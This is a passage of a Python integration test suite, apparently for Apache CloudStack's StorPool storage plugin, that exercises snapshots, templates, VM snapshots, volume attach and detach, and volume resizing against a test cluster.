You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # Import Local Modules from marvin.codes import FAILED, KVM, PASS, XEN_SERVER, RUNNING from nose.plugins.attrib import attr from marvin.cloudstackTestCase import cloudstackTestCase from marvin.lib.utils import random_gen, cleanup_resources, validateList, is_snapshot_on_nfs, isAlmostEqual from marvin.lib.base import (Account, Cluster, Configurations, ServiceOffering, Snapshot, StoragePool, Template, VirtualMachine, VmSnapshot, Volume, SecurityGroup, Role, ) from marvin.lib.common import (get_zone, get_domain, get_template, list_disk_offering, list_hosts, list_snapshots, list_storage_pools, list_volumes, list_virtual_machines, list_configurations, list_service_offering, list_clusters, list_zones) from marvin.cloudstackAPI import (listOsTypes, listTemplates, listHosts, createTemplate, createVolume, getVolumeSnapshotDetails, resizeVolume, listZones) import time import pprint import random import subprocess from storpool import spapi from storpool import sptypes from marvin.configGenerator import configuration import uuid from sp_util import (TestData, StorPoolHelper) class TestStoragePool(cloudstackTestCase): @classmethod def setUpClass(cls): super(TestStoragePool, cls).setUpClass() try: cls.setUpCloudStack() except Exception: cls.cleanUpCloudStack() raise @classmethod def setUpCloudStack(cls): testClient = super(TestStoragePool, cls).getClsTestClient() cls._cleanup = [] cls.apiclient = testClient.getApiClient() cls.helper = StorPoolHelper() cls.unsupportedHypervisor = False cls.hypervisor = testClient.getHypervisorInfo() if cls.hypervisor.lower() in ("hyperv", "lxc"): cls.unsupportedHypervisor = True return cls.services = testClient.getParsedTestDataConfig() # Get Zone, Domain and templates cls.domain = get_domain(cls.apiclient) cls.zone = None zones = list_zones(cls.apiclient) for z in zones: if z.name == cls.getClsConfig().mgtSvr[0].zone: cls.zone = z assert cls.zone is not None cls.sp_template_1 = "ssd" storpool_primary_storage = { "name" : cls.sp_template_1, "zoneid": cls.zone.id, "url": "SP_API_HTTP=10.2.23.248:81;SP_AUTH_TOKEN=<PASSWORD>;SP_TEMPLATE=%s" % cls.sp_template_1, "scope": "zone", "capacitybytes": 564325555333, "capacityiops": 155466, "hypervisor": "kvm", "provider": "StorPool", "tags": cls.sp_template_1 } cls.storpool_primary_storage = storpool_primary_storage host, port, auth = cls.getCfgFromUrl(url = storpool_primary_storage["url"]) cls.spapi = spapi.Api(host=host, port=port, auth=auth, multiCluster=True) storage_pool = list_storage_pools( cls.apiclient, name=storpool_primary_storage["name"] ) if storage_pool is None: newTemplate = sptypes.VolumeTemplateCreateDesc(name = storpool_primary_storage["name"],placeAll = "virtual", placeTail = "virtual", placeHead = "virtual", replication=1) template_on_local = cls.spapi.volumeTemplateCreate(newTemplate) storage_pool = StoragePool.create(cls.apiclient, storpool_primary_storage) else: storage_pool = storage_pool[0] cls.primary_storage = storage_pool storpool_service_offerings_ssd = { "name": cls.sp_template_1, "displaytext": "SP_CO_2 (Min IOPS = 10,000; Max IOPS = 15,000)", "cpunumber": 1, "cpuspeed": 500, "memory": 512, 
"storagetype": "shared", "customizediops": False, "hypervisorsnapshotreserve": 200, "tags": cls.sp_template_1 } service_offerings_ssd = list_service_offering( cls.apiclient, name=storpool_service_offerings_ssd["name"] ) if service_offerings_ssd is None: service_offerings_ssd = ServiceOffering.create(cls.apiclient, storpool_service_offerings_ssd) else: service_offerings_ssd = service_offerings_ssd[0] cls.service_offering = service_offerings_ssd cls.debug(pprint.pformat(cls.service_offering)) cls.sp_template_2 = "ssd2" storpool_primary_storage2 = { "name" : cls.sp_template_2, "zoneid": cls.zone.id, "url": "SP_API_HTTP=10.2.23.248:81;SP_AUTH_TOKEN=<PASSWORD>;SP_TEMPLATE=%s" % cls.sp_template_2, "scope": "zone", "capacitybytes": 564325555333, "capacityiops": 1554, "hypervisor": "kvm", "provider": "StorPool", "tags": cls.sp_template_2 } cls.storpool_primary_storage2 = storpool_primary_storage2 storage_pool = list_storage_pools( cls.apiclient, name=storpool_primary_storage2["name"] ) if storage_pool is None: newTemplate = sptypes.VolumeTemplateCreateDesc(name = storpool_primary_storage2["name"],placeAll = "virtual", placeTail = "virtual", placeHead = "virtual", replication=1) template_on_local = cls.spapi.volumeTemplateCreate(newTemplate) storage_pool = StoragePool.create(cls.apiclient, storpool_primary_storage2) else: storage_pool = storage_pool[0] cls.primary_storage2 = storage_pool storpool_service_offerings_ssd2 = { "name": cls.sp_template_2, "displaytext": "SP_CO_2", "cpunumber": 1, "cpuspeed": 500, "memory": 512, "storagetype": "shared", "customizediops": False, "tags": cls.sp_template_2 } service_offerings_ssd2 = list_service_offering( cls.apiclient, name=storpool_service_offerings_ssd2["name"] ) if service_offerings_ssd2 is None: service_offerings_ssd2 = ServiceOffering.create(cls.apiclient, storpool_service_offerings_ssd2) else: service_offerings_ssd2 = service_offerings_ssd2[0] cls.service_offering2 = service_offerings_ssd2 disk_offerings = list_disk_offering( cls.apiclient, name="Small" ) disk_offering_20 = list_disk_offering( cls.apiclient, name="Medium" ) disk_offering_100 = list_disk_offering( cls.apiclient, name="Large" ) cls.disk_offerings = disk_offerings[0] cls.disk_offering_20 = disk_offering_20[0] cls.disk_offering_100 = disk_offering_100[0] #The version of CentOS has to be supported template = get_template( cls.apiclient, cls.zone.id, account = "system" ) if template == FAILED: assert False, "get_template() failed to return template\ with description %s" % cls.services["ostype"] cls.services["domainid"] = cls.domain.id cls.services["small"]["zoneid"] = cls.zone.id cls.services["templates"]["ostypeid"] = template.ostypeid cls.services["zoneid"] = cls.zone.id cls.services["diskofferingid"] = cls.disk_offerings.id role = Role.list(cls.apiclient, name='Admin') # Create VMs, VMs etc cls.account = Account.create( cls.apiclient, cls.services["account"], domainid=cls.domain.id, roleid = role[0].id ) securitygroup = SecurityGroup.list(cls.apiclient, account = cls.account.name, domainid= cls.account.domainid)[0] cls.helper.set_securityGroups(cls.apiclient, account = cls.account.name, domainid= cls.account.domainid, id = securitygroup.id) cls._cleanup.append(cls.account) cls.volume_1 = Volume.create( cls.apiclient, {"diskname":"StorPoolDisk-1" }, zoneid=cls.zone.id, diskofferingid=disk_offerings[0].id, account=cls.account.name, domainid=cls.account.domainid, ) cls.volume_2 = Volume.create( cls.apiclient, {"diskname":"StorPoolDisk-2" }, zoneid=cls.zone.id, 
diskofferingid=disk_offerings[0].id, account=cls.account.name, domainid=cls.account.domainid, ) cls.volume = Volume.create( cls.apiclient, {"diskname":"StorPoolDisk-3" }, zoneid=cls.zone.id, diskofferingid=disk_offerings[0].id, account=cls.account.name, domainid=cls.account.domainid, ) cls.virtual_machine = VirtualMachine.create( cls.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=cls.account.name, domainid=cls.account.domainid, zoneid=cls.zone.id, templateid=template.id, serviceofferingid=cls.service_offering.id, hypervisor=cls.hypervisor, rootdisksize=10 ) cls.virtual_machine2 = VirtualMachine.create( cls.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=cls.account.name, domainid=cls.account.domainid, zoneid=cls.zone.id, templateid=template.id, serviceofferingid=cls.service_offering.id, hypervisor=cls.hypervisor, rootdisksize=10 ) cls.vm_migrate = VirtualMachine.create( cls.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=cls.account.name, domainid=cls.account.domainid, zoneid=cls.zone.id, templateid=template.id, serviceofferingid=cls.service_offering.id, hypervisor=cls.hypervisor, rootdisksize=10 ) cls.template = template cls.hostid = cls.virtual_machine.hostid cls.random_data_0 = random_gen(size=100) cls.test_dir = "/tmp" cls.random_data = "random.data" return @classmethod def tearDownClass(cls): cls.cleanUpCloudStack() @classmethod def cleanUpCloudStack(cls): try: # Cleanup resources used cleanup_resources(cls.apiclient, cls._cleanup) except Exception as e: raise Exception("Warning: Exception during cleanup : %s" % e) return def setUp(self): self.apiclient = self.testClient.getApiClient() self.dbclient = self.testClient.getDbConnection() if self.unsupportedHypervisor: self.skipTest("Skipping test because unsupported hypervisor\ %s" % self.hypervisor) return def tearDown(self): return @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_01_snapshot_to_template(self): ''' Create template from snapshot without bypass secondary storage ''' volume = Volume.list( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "false") snapshot = Snapshot.create( self.apiclient, volume_id = volume[0].id, account=self.account.name, domainid=self.account.domainid, ) self.assertIsNotNone(snapshot, "Could not create snapshot") self.assertIsInstance(snapshot, Snapshot, "Snapshot is not an instance of Snapshot") template = self.create_template_from_snapshot( self.apiclient, self.services, snapshotid = snapshot.id ) virtual_machine = VirtualMachine.create(self.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=self.account.name, domainid=self.account.domainid, zoneid=self.zone.id, templateid=template.id, serviceofferingid=self.service_offering.id, hypervisor=self.hypervisor, rootdisksize=10 ) ssh_client = virtual_machine.get_ssh_client() self.assertIsNotNone(template, "Template is None") self.assertIsInstance(template, Template, "Template is instance of template") self._cleanup.append(template) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_02_snapshot_to_template_bypass_secondary(self): ''' Test Create Template from snapshot bypassing secondary storage ''' ##cls.virtual_machine volume = list_volumes( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) try: name = volume[0].path.split("/")[3] sp_volume = 
self.spapi.volumeList(volumeName = "~" + name) except spapi.ApiError as err: raise Exception(err) backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "true") snapshot = Snapshot.create( self.apiclient, volume_id = volume[0].id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True if flag == False: raise Exception("Could not find snasphot in snapshot_details") except spapi.ApiError as err: raise Exception(err) self.assertIsNotNone(snapshot, "Could not create snapshot") self.assertIsInstance(snapshot, Snapshot, "Snapshot is not an instance of Snapshot") template = self.create_template_from_snapshot( self.apiclient, self.services, snapshotid = snapshot.id ) flag = False sp_snapshots = self.spapi.snapshotsList() for snap in sp_snapshots: tags = snap.tags for t in tags: if tags[t] == template.id: flag = True break else: continue break if flag is False: raise Exception("Template does not exists in Storpool") virtual_machine = VirtualMachine.create(self.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=self.account.name, domainid=self.account.domainid, zoneid=self.zone.id, templateid=template.id, serviceofferingid=self.service_offering.id, hypervisor=self.hypervisor, rootdisksize=10 ) ssh_client = virtual_machine.get_ssh_client() self.assertIsNotNone(template, "Template is None") self.assertIsInstance(template, Template, "Template is instance of template") self._cleanup.append(template) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_03_snapshot_volume_with_secondary(self): ''' Test Create snapshot and backup to secondary ''' backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "false") volume = list_volumes( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) snapshot = Snapshot.create( self.apiclient, volume_id = volume[0].id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True if flag == False: raise Exception("Could not find snapshot in snapshot_details") except spapi.ApiError as err: raise Exception(err) self.assertIsNotNone(snapshot, "Could not create snapshot") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_04_snapshot_volume_bypass_secondary(self): ''' Test snapshot bypassing secondary ''' backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "true") volume = list_volumes( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) snapshot = Snapshot.create( self.apiclient, volume_id = volume[0].id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id 
snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True if flag == False: raise Exception("Could not find snapshot in snapshot details") except spapi.ApiError as err: raise Exception(err) self.assertIsNotNone(snapshot, "Could not create snapshot") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_05_delete_template_bypassed_secondary(self): ''' Test delete template from snapshot bypassed secondary storage ''' volume = list_volumes( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) try: name = volume[0].path.split("/")[3] sp_volume = self.spapi.volumeList(volumeName = "~" + name) except spapi.ApiError as err: raise Exception(err) backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "true") snapshot = Snapshot.create( self.apiclient, volume_id = volume[0].id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True if flag == False: raise Exception("Could not find snapshot in snapshot details") except spapi.ApiError as err: raise Exception(err) self.assertIsNotNone(snapshot, "Could not create snapshot") self.assertIsInstance(snapshot, Snapshot, "Snapshot is not an instance of Snapshot") template = self.create_template_from_snapshot( self.apiclient, self.services, snapshotid = snapshot.id ) flag = False storpoolGlId = None sp_snapshots = self.spapi.snapshotsList() for snap in sp_snapshots: tags = snap.tags for t in tags: if tags[t] == template.id: storpoolGlId = "~" + snap.globalId flag = True break else: continue break if flag is False: raise Exception("Template does not exists in Storpool") self.assertIsNotNone(template, "Template is None") self.assertIsInstance(template, Template, "Template is instance of template") temp = Template.delete(template, self.apiclient, self.zone.id) self.assertIsNone(temp, "Template was not deleted") try: sp_snapshot = self.spapi.snapshotList(snapshotName = storpoolGlId) if sp_snapshot is not None: self.debug("Snapshot exists on StorPool name " + storpoolGlId) except spapi.ApiError as err: self.debug("Do nothing the template has to be deleted") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_06_template_from_snapshot(self): ''' Test create template bypassing secondary from snapshot which is backed up on secondary storage ''' ##cls.virtual_machine volume = list_volumes( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) try: name = volume[0].path.split("/")[3] sp_volume = self.spapi.volumeList(volumeName = "~" + name) except spapi.ApiError as err: raise Exception(err) backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "false") snapshot = Snapshot.create( self.apiclient, volume_id = volume[0].id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = 
snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True if flag == False: raise Exception("Could not find snapshot in snapsho details") except spapi.ApiError as err: raise Exception(err) self.assertIsNotNone(snapshot, "Could not create snapshot") self.assertIsInstance(snapshot, Snapshot, "Snapshot is not an instance of Snapshot") backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "true") template = self.create_template_from_snapshot( self.apiclient, self.services, snapshotid = snapshot.id ) flag = False globalId = None sp_snapshots = self.spapi.snapshotsList() for snap in sp_snapshots: tags = snap.tags for t in tags: if tags[t] == template.id: flag = True globalId = snap.globalId break else: continue break if flag is False: raise Exception("Template does not exists in Storpool") self.assertIsNotNone(template, "Template is None") self.assertIsInstance(template, Template, "Template is instance of template") temp = Template.delete(template, self.apiclient, self.zone.id) self.assertIsNone(temp, "Template was not deleted") if globalId is not None: try: sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + globalId) if sp_snapshot is not None: self.debug("Snapshot exists on Storpool name " + globalId) except spapi.ApiError as err: self.debug("Do nothing the template has to be deleted") else: flag = False sp_snapshots = self.spapi.snapshotsList() for snap in sp_snapshots: tags = snap.tags for t in tags: if tags[t] == template.id: flag = True break else: continue break if flag is True: raise Exception("Template should not exists in Storpool") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_07_delete_snapshot_of_deleted_volume(self): ''' Delete snapshot and template if volume is already deleted, not bypassing secondary ''' backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "false") volume = Volume.create( self.apiclient, {"diskname":"StorPoolDisk-Delete" }, zoneid = self.zone.id, diskofferingid = self.disk_offerings.id, account=self.account.name, domainid=self.account.domainid, ) delete = volume self.virtual_machine2.stop(self.apiclient, forced=True) self.virtual_machine2.attach_volume( self.apiclient, volume ) self.virtual_machine2.detach_volume( self.apiclient, volume ) volume = list_volumes(self.apiclient, id = volume.id) name = volume[0].path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) except spapi.ApiError as err: raise Exception(err) snapshot = Snapshot.create( self.apiclient, volume_id = volume[0].id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] try: sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True except spapi.ApiError as err: raise Exception(err) if flag == False: raise Exception("Could not finad snapshot in snapshot details") except Exception as err: raise Exception(err) template = self.create_template_from_snapshot(self.apiclient, self.services, snapshotid = snapshot.id) 
template_from_volume = self.create_template_from_snapshot(self.apiclient, self.services, volumeid = volume[0].id) Volume.delete(delete, self.apiclient, ) Snapshot.delete(snapshot, self.apiclient) flag = False try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) if snapshot_details is not None: try: for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True except spapi.ApiError as err: flag = False if flag is True: raise Exception("Snapshot was not deleted") except Exception as err: self.debug('Snapshot was deleted %s' % err) Template.delete(template, self.apiclient, zoneid = self.zone.id) Template.delete(template_from_volume, self.apiclient, zoneid = self.zone.id) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_08_delete_snapshot_of_deleted_volume(self): ''' Delete snapshot and template if volume is already deleted, bypassing secondary ''' backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "true") volume = Volume.create( self.apiclient, {"diskname":"StorPoolDisk-Delete" }, zoneid = self.zone.id, diskofferingid = self.disk_offerings.id, account=self.account.name, domainid=self.account.domainid, ) delete = volume self.virtual_machine2.attach_volume( self.apiclient, volume ) self.virtual_machine2.detach_volume( self.apiclient, volume ) volume = list_volumes(self.apiclient, id = volume.id) name = volume[0].path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) except spapi.ApiError as err: raise Exception(err) snapshot = Snapshot.create( self.apiclient, volume_id = volume[0].id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) if snapshot_details is not None: flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] try: sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True except spapi.ApiError as err: raise Exception(err) if flag == False: raise Exception("Could not find snapshot in snapshot details") except Exception as err: raise Exception(err) template = self.create_template_from_snapshot(self.apiclient, self.services, snapshotid = snapshot.id) Volume.delete(delete, self.apiclient, ) Snapshot.delete(snapshot, self.apiclient) flag = False try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) if snapshot_details is not None: try: for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True except spapi.ApiError as err: flag = False if flag is True: raise Exception("Snapshot was not deleted") except Exception as err: self.debug('Snapshot was deleted %s' % err) Template.delete(template, self.apiclient, zoneid = self.zone.id) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_09_vm_from_bypassed_template(self): '''Create virtual machine with sp.bypass.secondary.storage=false from template created on StorPool and 
Secondary Storage''' volume = list_volumes( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) name = volume[0].path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) except spapi.ApiError as err: raise Exception(err) backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "true") snapshot = Snapshot.create( self.apiclient, volume_id = volume[0].id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] try: sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True except spapi.ApiError as err: raise Exception(err) if flag == False: raise Exception("Could not find snapshot in snapshot details") except Exception as err: raise Exception(err) self.assertIsNotNone(snapshot, "Could not create snapshot") self.assertIsInstance(snapshot, Snapshot, "Snapshot is not an instance of Snapshot") template = self.create_template_from_snapshot( self.apiclient, self.services, snapshotid = snapshot.id ) self._cleanup.append(template) flag = False sp_snapshots = self.spapi.snapshotsList() for snap in sp_snapshots: tags = snap.tags for t in tags: if tags[t] == template.id: flag = True break else: continue break if flag is False: raise Exception("Template does not exists in Storpool") self.assertIsNotNone(template, "Template is None") self.assertIsInstance(template, Template, "Template is instance of template") backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "false") vm = VirtualMachine.create( self.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=self.account.name, domainid=self.account.domainid, zoneid=self.zone.id, templateid = template.id, serviceofferingid=self.service_offering.id, hypervisor=self.hypervisor, rootdisksize=10, ) ssh_client = vm.get_ssh_client(reconnect=True) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_10_create_vm_snapshots(self): """Test to create VM snapshots """ volume_attached = self.virtual_machine.attach_volume( self.apiclient, self.volume ) vol = list_volumes(self.apiclient, virtualmachineid=self.virtual_machine.id, id=volume_attached.id) name = vol[0].path.split("/")[3] sp_volume = self.spapi.volumeList(volumeName = "~" + name) self.assertEqual(volume_attached.id, self.volume.id, "Is not the same volume ") try: # Login to VM and write data to file system ssh_client = self.virtual_machine.get_ssh_client() cmds = [ "echo %s > %s/%s" % (self.random_data_0, self.test_dir, self.random_data), "sync", "sleep 1", "sync", "sleep 1", "cat %s/%s" % (self.test_dir, self.random_data) ] for c in cmds: self.debug(c) result = ssh_client.execute(c) self.debug(result) except Exception: self.fail("SSH failed for Virtual machine: %s" % self.virtual_machine.ipaddress) self.assertEqual( self.random_data_0, result[0], "Check the random data has be write into temp file!" ) time.sleep(30) MemorySnapshot = False vm_snapshot = VmSnapshot.create( self.apiclient, self.virtual_machine.id, MemorySnapshot, "TestSnapshot", "Display Text" ) self.assertEqual( vm_snapshot.state, "Ready", "Check the snapshot of vm is ready!" 
) return @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_11_revert_vm_snapshots(self): """Test to revert VM snapshots """ try: ssh_client = self.virtual_machine.get_ssh_client() cmds = [ "rm -rf %s/%s" % (self.test_dir, self.random_data), "ls %s/%s" % (self.test_dir, self.random_data) ] for c in cmds: self.debug(c) result = ssh_client.execute(c) self.debug(result) except Exception: self.fail("SSH failed for Virtual machine: %s" % self.virtual_machine.ipaddress) if str(result[0]).index("No such file or directory") == -1: self.fail("Check the random data has be delete from temp file!") time.sleep(30) list_snapshot_response = VmSnapshot.list( self.apiclient, virtualmachineid=self.virtual_machine.id, listall=True) self.assertEqual( isinstance(list_snapshot_response, list), True, "Check list response returns a valid list" ) self.assertNotEqual( list_snapshot_response, None, "Check if snapshot exists in ListSnapshot" ) self.assertEqual( list_snapshot_response[0].state, "Ready", "Check the snapshot of vm is ready!" ) self.virtual_machine.stop(self.apiclient, forced=True) VmSnapshot.revertToSnapshot( self.apiclient, list_snapshot_response[0].id ) self.virtual_machine.start(self.apiclient) try: ssh_client = self.virtual_machine.get_ssh_client(reconnect=True) cmds = [ "cat %s/%s" % (self.test_dir, self.random_data) ] for c in cmds: self.debug(c) result = ssh_client.execute(c) self.debug(result) except Exception: self.fail("SSH failed for Virtual machine: %s" % self.virtual_machine.ipaddress) self.assertEqual( self.random_data_0, result[0], "Check the random data is equal with the ramdom file!" ) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_12_delete_vm_snapshots(self): """Test to delete vm snapshots """ list_snapshot_response = VmSnapshot.list( self.apiclient, virtualmachineid=self.virtual_machine.id, listall=True) self.assertEqual( isinstance(list_snapshot_response, list), True, "Check list response returns a valid list" ) self.assertNotEqual( list_snapshot_response, None, "Check if snapshot exists in ListSnapshot" ) VmSnapshot.deleteVMSnapshot( self.apiclient, list_snapshot_response[0].id) time.sleep(30) list_snapshot_response = VmSnapshot.list( self.apiclient, #vmid=self.virtual_machine.id, virtualmachineid=self.virtual_machine.id, listall=False) self.debug('list_snapshot_response -------------------- %s' % list_snapshot_response) self.assertIsNone(list_snapshot_response, "snapshot is already deleted") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_13_detach_volume(self): '''Attach volume on VM on 2nd zone''' self.virtual_machine.stop(self.apiclient) self.virtual_machine.detach_volume( self.apiclient, self.volume ) vol = list_volumes(self.apiclient, id=self.volume.id) name = vol[0].path.split("/")[3] spvolume = self.spapi.volumeList(volumeName = "~" + name) self.assertEqual(vol[0].id, self.volume.id, "Is not the same volume ") tags = spvolume[0].tags for t in tags: self.assertFalse(t.lower() == 'cvm'.lower(), "cvm tag still set on detached volume") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_14_attach_detach_volume_to_running_vm(self): ''' Test Attach Volume To Running Virtual Machine ''' time.sleep(60) self.assertEqual(VirtualMachine.RUNNING, self.virtual_machine.state, "Running") volume = self.virtual_machine.attach_volume( self.apiclient, self.volume_1 ) print(volume) self.assertIsNotNone(volume, "Volume is not None") list_vm_volumes = Volume.list( 
self.apiclient, virtualmachineid = self.virtual_machine.id, id= volume.id ) print(list_vm_volumes) self.assertEqual(volume.id, list_vm_volumes[0].id, "Is true") name = list_vm_volumes[0].path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) except spapi.ApiError as err: raise Exception(err) volume = self.virtual_machine.detach_volume( self.apiclient, self.volume_1 ) list_vm_volumes = Volume.list( self.apiclient, virtualmachineid = self.virtual_machine.id, id = volume.id ) print(list_vm_volumes) self.assertIsNone(list_vm_volumes, "Is None") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_15_resize_root_volume_on_working_vm(self): ''' Test Resize Root volume on Running Virtual Machine ''' self.assertEqual(VirtualMachine.RUNNING, self.virtual_machine2.state, "Running") volume = list_volumes( self.apiclient, virtualmachineid = self.virtual_machine2.id, type = "ROOT", listall = True, ) volume = volume[0] name = volume.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != volume.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) self.assertEqual(volume.type, 'ROOT', "Volume is not of ROOT type") shrinkOk = False if volume.size > int((self.disk_offering_20.disksize) * (1024**3)): shrinkOk= True cmd = resizeVolume.resizeVolumeCmd() cmd.id = volume.id cmd.size = 20 cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=volume.id ) self.assertTrue( (new_size[0].size == int((self.disk_offering_20.disksize) * (1024**3))), "New size is not int((self.disk_offering_20) * (1024**3)" ) volume = new_size[0] name = volume.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != volume.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) shrinkOk = False if volume.size > int((self.disk_offering_100.disksize) * (1024**3)): shrinkOk= True cmd = resizeVolume.resizeVolumeCmd() cmd.id = volume.id cmd.size = 100 cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=volume.id ) volume = new_size[0] name = volume.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != volume.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) self.assertTrue( (new_size[0].size == 